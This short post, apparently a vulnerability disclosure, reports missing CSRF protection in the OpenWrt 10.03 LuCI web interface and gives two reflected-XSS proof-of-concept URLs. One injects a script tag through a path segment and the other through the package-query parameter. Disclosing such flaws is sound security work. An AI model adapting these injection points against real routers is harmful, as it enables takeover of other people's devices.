The openwrt 10.03 webinterface seems to have no protection against csrf...
In addition, the following xss can be used against the webinterface:

1. (nearly any page) e.g.
http://192.168.0.1/cgi-bin/luci/;stok=d/admin/network/network/"/><script>alert(1);</script>

2. the query for packages e.g.
http://192.168.0.1/cgi-bin/luci/;stok=d/admin/system/packages?query=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&submit=OK

--
Small things make base men proud.    -- William Shakespeare, "Henry VI"